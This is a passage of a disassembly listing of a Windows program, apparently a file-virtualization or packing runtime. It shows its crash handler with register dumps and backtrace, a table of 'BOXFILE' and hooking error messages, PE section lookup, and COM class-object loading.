cmp [ebp+var_28], 0
jz loc_4D8BF5
and [ebp+var_30], 0
loc_4D8B50: ; CODE XREF: sub_4D8A16+16B�j
lea eax, [ebp+var_2C]
push eax
mov eax, [ebp+arg_0]
mov al, [eax]
mov byte ptr [ebp+var_40], al
push [ebp+var_40]
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
call sub_4D89B8
pop ecx
pop ecx
and eax, 0Fh
mov ecx, [ebp+var_30]
shl ecx, 4
or eax, ecx
mov [ebp+var_30], eax
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_28]
jnz short loc_4D8B50
movzx eax, [ebp+var_2C]
test eax, eax
jnz short loc_4D8BF5
mov [ebp+var_44], offset a_ ; ".###"
mov eax, [ebp+arg_0]
mov [ebp+var_48], eax
loc_4D8B98: ; CODE XREF: sub_4D8A16+1B4�j
mov eax, [ebp+var_48]
mov al, [eax]
mov [ebp+var_49], al
mov ecx, [ebp+var_44]
cmp al, [ecx]
jnz short loc_4D8BD2
cmp [ebp+var_49], 0
jz short loc_4D8BCC
mov eax, [ebp+var_48]
mov al, [eax+1]
mov [ebp+var_4A], al
mov ecx, [ebp+var_44]
cmp al, [ecx+1]
jnz short loc_4D8BD2
add [ebp+var_48], 2
add [ebp+var_44], 2
cmp [ebp+var_4A], 0
jnz short loc_4D8B98
loc_4D8BCC: ; CODE XREF: sub_4D8A16+195�j
and [ebp+var_50], 0
jmp short loc_4D8BDA
; ---------------------------------------------------------------------------
loc_4D8BD2: ; CODE XREF: sub_4D8A16+18F�j
; sub_4D8A16+1A6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_50], eax
loc_4D8BDA: ; CODE XREF: sub_4D8A16+1BA�j
mov eax, [ebp+var_50]
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_4D8BF5
mov eax, [ebp+var_30]
mov [ebp+var_58], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_58]
jmp short loc_4D8C08
; ---------------------------------------------------------------------------
loc_4D8BF5: ; CODE XREF: sub_4D8A16+30�j
; sub_4D8A16+6F�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D8C06
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_4D8C06: ; CODE XREF: sub_4D8A16+1E3�j
xor eax, eax
loc_4D8C08: ; CODE XREF: sub_4D8A16+1DD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D8A16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8C17 proc near ; CODE XREF: sub_4CD2E0+3F8�p
push ebp
mov ebp, esp
push offset sub_4D8C27
call ds:dword_4E1790 ; SetUnhandledExceptionFilter
pop ebp
retn
sub_4D8C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8C27 proc near ; CODE XREF: sub_4D5BD7+367�p
; sub_4D6B7F+3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset a__seh__0xXAt0x ; "__SEH__ 0x%x at 0x%x"
call sub_4D8726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+98h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0BCh]
push offset aCs0x08xSs0x08x ; "CS :0x%08X SS :0x%08X DS :0x%08X"
call sub_4D8726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+8Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+90h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+94h]
push offset aEs0x08xFs0x08x ; "ES :0x%08X FS :0x%08X GS :0x%08X"
call sub_4D8726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
push offset aEax0x08xEdx0x0 ; "EAX:0x%08X EDX:0x%08X ECX:0x%08X"
call sub_4D8726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
push offset aEsp0x08xEbp0x0 ; "ESP:0x%08X EBP:0x%08X EIP:0x%08X"
call sub_4D8726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
push offset aEsi0x08xEdi0x0 ; "ESI:0x%08X EDI:0x%08X"
call sub_4D8726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
call sub_4D918E
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, 11000000h
mov [ebp+var_8], eax
cmp [ebp+var_8], 16h
ja loc_4D8E67
mov eax, [ebp+var_8]
jmp ds:off_4D8E97[eax*4]
loc_4D8D8E: ; DATA XREF: _4:off_4D8E97�o
mov [ebp+var_4], offset aAssertionFaile ; "ASSERTION FAILED"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8D9A: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8E9B�o
mov [ebp+var_4], offset aHasNoAccessToE ; "HAS NO ACCESS TO EXECUTABLE"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DA6: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8E9F�o
mov [ebp+var_4], offset aExecutableIsNo ; "EXECUTABLE IS NOT NT IMAGE"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DB2: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EC7�o
mov [ebp+var_4], offset aDynamicLibrary ; "DYNAMIC LIBRARY IS NOT NT IMAGE"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DBE: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EA3�o
mov [ebp+var_4], offset aExecutableCorr ; "EXECUTABLE CORRUPTED"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DCA: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EA7�o
mov [ebp+var_4], offset aPathIsVeryLong ; "PATH IS VERY LONG"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DD6: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EAB�o
mov [ebp+var_4], offset aCouldNotOpenBo ; "COULD NOT OPEN BOXFILE"
jmp loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DE2: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EAF�o
mov [ebp+var_4], offset aReadBoxfileErr ; "READ BOXFILE ERROR"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DEB: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EB3�o
mov [ebp+var_4], offset aBoxfileCorrupt ; "BOXFILE CORRUPTED"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DF4: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EB7�o
mov [ebp+var_4], offset aFeatureIsNotIm ; "FEATURE IS NOT IMPLEMENTED"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8DFD: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EBB�o
mov [ebp+var_4], offset aOutOfMemory ; "OUT OF MEMORY"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E06: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EBF�o
mov [ebp+var_4], offset aWrappersTableB ; "WRAPPERS TABLE BROKEN"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E0F: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EC3�o
mov [ebp+var_4], offset aVirtualprote_0 ; "VIRTUALPROTECT BROKEN"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E18: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8ECB�o
mov [ebp+var_4], offset aCouldNotCreate ; "COULD NOT CREATE HEAP"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E21: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8ECF�o
mov [ebp+var_4], offset aHeapCorrupted ; "HEAP CORRUPTED"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E2A: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8ED7�o
mov [ebp+var_4], offset aDllCorrupted ; "DLL CORRUPTED"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E33: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EE7�o
mov [ebp+var_4], offset aInvalidCompres ; "INVALID COMPRESSION/ENCRYPTION ALGORITH"...
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E3C: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8ED3�o
mov [ebp+var_4], offset aPackedDllOrBox ; "PACKED DLL OR BOXFILE CORRUPTED"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E45: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EDB�o
mov [ebp+var_4], offset aHookingDllErro ; "HOOKING DLL ERROR"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E4E: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EDF�o
mov [ebp+var_4], offset aGetmodulenameE ; "GetModuleName ERROR"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E57: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EE3�o
mov [ebp+var_4], offset aBadFuulname ; "BAD FUULNAME"
jmp short loc_4D8E67
; ---------------------------------------------------------------------------
loc_4D8E60: ; CODE XREF: sub_4D8C27+160�j
; DATA XREF: _4:004D8EEF�o
mov [ebp+var_4], offset aInvalidDllRelo ; "INVALID DLL RELOCATION"
loc_4D8E67: ; CODE XREF: sub_4D8C27+157�j
; sub_4D8C27+160�j ...
cmp [ebp+var_4], 0
jz short loc_4D8E8C
push 0
push 0
call ds:dword_4E17C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_4DE4F4
push [ebp+var_4]
push 0
call ds:dword_4E17D0 ; MessageBoxA
jmp short loc_4D8E90
; ---------------------------------------------------------------------------
loc_4D8E8C: ; CODE XREF: sub_4D8C27+244�j
xor eax, eax
jmp short locret_4D8E93
; ---------------------------------------------------------------------------
loc_4D8E90: ; CODE XREF: sub_4D8C27+263�j
push 1
pop eax
locret_4D8E93: ; CODE XREF: sub_4D8C27+267�j
leave
retn 4
sub_4D8C27 endp
; ---------------------------------------------------------------------------
off_4D8E97 dd offset loc_4D8D8E ; DATA XREF: sub_4D8C27+160�r
dd offset loc_4D8D9A
dd offset loc_4D8DA6
dd offset loc_4D8DBE
dd offset loc_4D8DCA
dd offset loc_4D8DD6
dd offset loc_4D8DE2
dd offset loc_4D8DEB
dd offset loc_4D8DF4
dd offset loc_4D8DFD
dd offset loc_4D8E06
dd offset loc_4D8E0F
dd offset loc_4D8DB2
dd offset loc_4D8E18
dd offset loc_4D8E21
dd offset loc_4D8E3C
dd offset loc_4D8E2A
dd offset loc_4D8E45
dd offset loc_4D8E4E
dd offset loc_4D8E57
dd offset loc_4D8E33
dd offset loc_4D8E67
dd offset loc_4D8E60
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D8EF3 proc near ; CODE XREF: sub_4D918E+40�p
; sub_4D918E+83�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE550
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, offset dword_4E5A90
test eax, eax
jnz short loc_4D8F2E
mov eax, offset aBroken ; "!broken!"
jmp loc_4D9006
; ---------------------------------------------------------------------------
loc_4D8F2E: ; CODE XREF: sub_4D8EF3+2F�j
mov ecx, 100h
xor eax, eax
mov edi, offset dword_4E5A90
rep stosd
and [ebp+var_4], 0
push 1Ch
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call ds:dword_4E17B0 ; VirtualQuery
test eax, eax
jnz short loc_4D8F78
push offset a0x08xUnknownUn ; "0x%08x:[unknown]:unknown"
push offset dword_4E5A90
call ds:dword_4E17D4 ; wsprintfA
pop ecx
pop ecx
mov [ebp+var_44], offset dword_4E5A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_44]
jmp loc_4D9006
; ---------------------------------------------------------------------------
loc_4D8F78: ; CODE XREF: sub_4D8EF3+5E�j
lea eax, [ebp+var_40]
push eax
call sub_4D90EF
pop ecx
mov [ebp+var_20], eax
and [ebp+var_24], 0
and [ebp+var_1C], 0
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call sub_4D9015
add esp, 10h
cmp [ebp+var_20], 0
jnz short loc_4D8FB1
mov [ebp+var_20], offset aUnknown ; "unknown"
loc_4D8FB1: ; CODE XREF: sub_4D8EF3+B5�j
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_20]
push [ebp+arg_0]
push offset a0x08xS03x08x ; "0x%08x:[%s]:(%03x:%08x)"
push offset dword_4E5A90
call ds:dword_4E17D4 ; wsprintfA
add esp, 18h
mov [ebp+var_48], offset dword_4E5A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_48]
jmp short loc_4D9006
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
push [ebp+arg_0]
push offset aBroken0x08x ; "!broken!0x%08x:"
push offset dword_4E5A90
call ds:dword_4E17D4 ; wsprintfA
add esp, 0Ch
mov eax, offset dword_4E5A90
loc_4D9006: ; CODE XREF: sub_4D8EF3+36�j
; sub_4D8EF3+80�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D8EF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9015 proc near ; CODE XREF: sub_4D8EF3+A9�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov ecx, [ecx+4]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+4]
mov [ebp+var_C], ecx
and [ebp+var_4], 0
jmp short loc_4D9058
; ---------------------------------------------------------------------------
loc_4D9051: ; CODE XREF: sub_4D9015:loc_4D90E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4D9058: ; CODE XREF: sub_4D9015+3A�j
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+6]
cmp [ebp+var_4], eax
jnb loc_4D90EA
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+0Ch]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_4]
imul ecx, 28h
mov edx, [ebp+var_8]
mov esi, [ebp+var_8]
mov eax, [edx+eax+10h]
cmp eax, [esi+ecx+8]
jbe short loc_4D90A6
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+10h]
mov [ebp+var_1C], eax
jmp short loc_4D90B6
; ---------------------------------------------------------------------------
loc_4D90A6: ; CODE XREF: sub_4D9015+7D�j
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+8]
mov [ebp+var_1C], eax
loc_4D90B6: ; CODE XREF: sub_4D9015+8F�j
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_C]
cmp eax, [ebp+var_18]
jb short loc_4D90E5
mov eax, [ebp+var_C]
cmp eax, [ebp+var_14]
jnb short loc_4D90E5
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_18]
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4D90EA
; ---------------------------------------------------------------------------
loc_4D90E5: ; CODE XREF: sub_4D9015+B0�j
; sub_4D9015+B8�j
jmp loc_4D9051
; ---------------------------------------------------------------------------
loc_4D90EA: ; CODE XREF: sub_4D9015+4D�j
; sub_4D9015+CE�j
xor al, al
pop esi
leave
retn
sub_4D9015 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D90EF proc near ; CODE XREF: sub_4D8EF3+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
push 41h
pop ecx
xor eax, eax
mov edi, offset dword_4E5E90
rep stosd
push 104h
push offset dword_4E5E90
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
call ds:dword_4E1714 ; GetModuleFileNameA
test eax, eax
jnz short loc_4D911F
xor eax, eax
jmp short loc_4D918B
; ---------------------------------------------------------------------------
loc_4D911F: ; CODE XREF: sub_4D90EF+2A�j
push 5Ch
push offset dword_4E5E90
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D913C
mov eax, [ebp+var_4]
inc eax
jmp short loc_4D918B
; ---------------------------------------------------------------------------
loc_4D913C: ; CODE XREF: sub_4D90EF+45�j
mov edi, offset dword_4E5E90
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 50h
pop eax
cmp eax, ecx
sbb eax, eax
neg eax
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4D9186
mov eax, [ebp+var_8]
mov ds:byte_4E5E40[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_4E5E41[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_4E5E42[eax], 2Eh
mov eax, [ebp+var_8]
lea eax, byte_4E5E40[eax]
jmp short loc_4D918B
; ---------------------------------------------------------------------------
loc_4D9186: ; CODE XREF: sub_4D90EF+6C�j
mov eax, offset dword_4E5E90
loc_4D918B: ; CODE XREF: sub_4D90EF+2E�j
; sub_4D90EF+4B�j ...
pop edi
leave
retn
sub_4D90EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D918E proc near ; CODE XREF: sub_4D8C27+132�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE560
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset aBacktrace ; "-- backtrace --"
call sub_4D8726
pop ecx
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_4D8EF3
pop ecx
push eax
push offset aS_6 ; " %s"
call sub_4D8726
pop ecx
pop ecx
and [ebp+var_20], 0
jmp short loc_4D91F6
; ---------------------------------------------------------------------------
loc_4D91E7: ; CODE XREF: sub_4D918E+96�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_4D91F6: ; CODE XREF: sub_4D918E+57�j
cmp [ebp+var_20], 40h
jnb short loc_4D9226
cmp [ebp+var_1C], 0
jz short loc_4D9226
mov eax, [ebp+var_1C]
cmp dword ptr [eax+4], 0
jz short loc_4D9226
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_4D8EF3
pop ecx
push eax
push offset aS_6 ; " %s"
call sub_4D8726
pop ecx
pop ecx
jmp short loc_4D91E7
; ---------------------------------------------------------------------------
loc_4D9226: ; CODE XREF: sub_4D918E+6C�j
; sub_4D918E+72�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D9242
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_4D8726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_4D9242: ; CODE XREF: sub_4D918E+9C�j
push offset aStack ; "--stack--"
call sub_4D8726
pop ecx
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
mov [ebp+var_4], 1
and [ebp+var_24], 0
jmp short loc_4D9267
; ---------------------------------------------------------------------------
loc_4D9260: ; CODE XREF: sub_4D918E+10F�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_4D9267: ; CODE XREF: sub_4D918E+D0�j
cmp [ebp+var_24], 8
jnb short loc_4D929F
mov eax, [ebp+var_1C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
mov eax, [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_1C]
push offset a0x08x0x08x0x08 ; "0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x"
call sub_4D8726
add esp, 18h
mov eax, [ebp+var_1C]
add eax, 10h
mov [ebp+var_1C], eax
jmp short loc_4D9260
; ---------------------------------------------------------------------------
loc_4D929F: ; CODE XREF: sub_4D918E+DD�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4D92BB
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_4D8726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_4D92BB: ; CODE XREF: sub_4D918E+115�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4D918E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D92CA proc near ; CODE XREF: sub_4CF63E+64�p
; sub_4D153F+2AF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
and [ebp+var_8], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+1]
push eax
call sub_4D835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
inc ecx
mov esi, [ebp+arg_0]
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_4D92CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D931F proc near ; CODE XREF: sub_4D93B3+1F�p
; sub_4D98C0+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jnz short loc_4D9336
mov eax, 80004005h
jmp short locret_4D93B1
; ---------------------------------------------------------------------------
loc_4D9336: ; CODE XREF: sub_4D931F+E�j
push [ebp+arg_0]
call sub_4D2D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4D93AC
push 8
pop edx
mov ecx, [ebp+var_4]
call sub_4D61E1
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4D936C
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_4D93B1
; ---------------------------------------------------------------------------
loc_4D936C: ; CODE XREF: sub_4D931F+3B�j
and [ebp+var_C], 0
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+var_8]
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4D9397
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_4D93B1
; ---------------------------------------------------------------------------
loc_4D9397: ; CODE XREF: sub_4D931F+66�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call [ebp+var_C]
mov ecx, [ebp+arg_14]
mov [ecx], eax
xor eax, eax
jmp short locret_4D93B1
; ---------------------------------------------------------------------------
loc_4D93AC: ; CODE XREF: sub_4D931F+27�j
mov eax, 80004005h
locret_4D93B1: ; CODE XREF: sub_4D931F+15�j
; sub_4D931F+4B�j ...
leave
retn
sub_4D931F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D93B3 proc near ; CODE XREF: sub_4D9518+53�p
; sub_4D9789+43�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 1Ch
and [ebp+var_4], 0
push [ebp+arg_18]
lea eax, [ebp+var_4]
push eax
push offset dword_4E11D8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4D931F
add esp, 18h
test eax, eax
jl loc_4D9511
mov eax, [ebp+arg_18]
cmp dword ptr [eax], 0
jge short loc_4D93F4
mov eax, [ebp+arg_18]
mov eax, [eax]
jmp locret_4D9516
; ---------------------------------------------------------------------------
loc_4D93F4: ; CODE XREF: sub_4D93B3+35�j
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_14], 0
and [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push offset dword_4E11C8
push [ebp+arg_4]
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+0Ch]
test eax, eax
jl loc_4D94BB
and [ebp+var_18], 0
jmp short loc_4D9430
; ---------------------------------------------------------------------------
loc_4D9429: ; CODE XREF: sub_4D93B3+F8�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4D9430: ; CODE XREF: sub_4D93B3+74�j
mov eax, [ebp+var_18]
cmp eax, [ebp+arg_10]
jnb short loc_4D94B0
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
lea eax, [ecx+eax+4]
push eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
push dword ptr [ecx+eax]
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax]
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+arg_14]
mov [edx+ecx+8], eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 0
jl short loc_4D947F
mov [ebp+var_C], 1
jmp short loc_4D949C
; ---------------------------------------------------------------------------
